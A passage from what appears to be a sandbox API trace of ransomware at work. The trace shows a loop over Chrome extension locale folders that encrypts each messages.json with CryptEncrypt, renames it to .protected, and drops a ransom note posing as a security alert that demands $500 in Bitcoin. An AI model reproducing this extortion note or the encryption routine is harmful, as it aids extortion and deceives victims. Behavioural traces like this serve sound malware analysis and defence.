data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\messages.json.protected")) returned 1 [0080.552] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.552] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.552] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\RESTORE_FILES.txt") returned 159 [0080.552] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\iw\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.552] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.552] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.553] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.553] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.553] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.553] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.553] CloseHandle (hObject=0x164) returned 1 [0080.553] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.553] lstrcmpiW (lpString1="ja", lpString2="Windows") returned -1 [0080.553] lstrcmpiW (lpString1="ja", lpString2="Program Files") returned -1 [0080.553] lstrcmpiW (lpString1="ja", lpString2="Program Files (x86)") returned -1 [0080.553] lstrcmpiW (lpString1="ja", lpString2="$Recycle.bin") returned 1 [0080.553] lstrcmpiW (lpString1="ja", lpString2="System Volume Information") returned -1 [0080.553] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja") returned 141 [0080.553] lstrcmpW (lpString1="ja", lpString2=".") returned 1 [0080.553] lstrcmpW (lpString1="ja", lpString2="..") returned 1 [0080.553] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\*") returned 143 [0080.553] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.554] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.554] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.554] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.554] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.554] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.554] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\.") returned 143 [0080.554] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.554] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.554] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.554] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.554] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.554] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.554] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.554] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\..") returned 144 [0080.554] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.554] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.554] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.554] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.554] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.554] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.554] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.554] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.554] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json") returned 155 [0080.554] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.554] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.554] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.554] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.554] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.555] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json") returned 155 [0080.555] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.555] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json") returned 155 [0080.555] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.555] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json") returned 155 [0080.555] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.555] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xfb, lpOverlapped=0x0) returned 1 [0080.556] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff05, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.556] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xfb, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xfb, lpOverlapped=0x0) returned 1 [0080.556] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.556] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.556] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.556] CloseHandle (hObject=0x168) returned 1 [0080.556] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json.protected") returned 165 [0080.556] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\messages.json.protected")) returned 1 [0080.557] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.557] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.557] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\RESTORE_FILES.txt") returned 159 [0080.557] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ja\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.557] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.557] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.558] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.558] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.558] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.558] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.558] CloseHandle (hObject=0x164) returned 1 [0080.559] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.559] lstrcmpiW (lpString1="ka", lpString2="Windows") returned -1 [0080.559] lstrcmpiW (lpString1="ka", lpString2="Program Files") returned -1 [0080.559] lstrcmpiW (lpString1="ka", lpString2="Program Files (x86)") returned -1 [0080.559] lstrcmpiW (lpString1="ka", lpString2="$Recycle.bin") returned 1 [0080.559] lstrcmpiW (lpString1="ka", lpString2="System Volume Information") returned -1 [0080.559] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka") returned 141 [0080.559] lstrcmpW (lpString1="ka", lpString2=".") returned 1 [0080.559] lstrcmpW (lpString1="ka", lpString2="..") returned 1 [0080.559] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\*") returned 143 [0080.559] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.559] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.559] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.559] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.560] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.560] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.560] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\.") returned 143 [0080.560] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.560] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.560] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.560] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.560] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.560] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.560] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.560] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\..") returned 144 [0080.560] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.560] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.560] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.560] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.560] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.560] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.560] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.560] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.560] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json") returned 155 [0080.560] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.560] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.560] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.560] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.560] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.560] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json") returned 155 [0080.560] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.560] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json") returned 155 [0080.560] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.560] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json") returned 155 [0080.560] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.561] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x165, lpOverlapped=0x0) returned 1 [0080.561] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffe9b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.561] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x165, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x165, lpOverlapped=0x0) returned 1 [0080.561] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.561] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.561] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.562] CloseHandle (hObject=0x168) returned 1 [0080.562] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json.protected") returned 165 [0080.562] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\ka\\messages.json.protected")) returned 1 [0080.562] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.562] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.562] 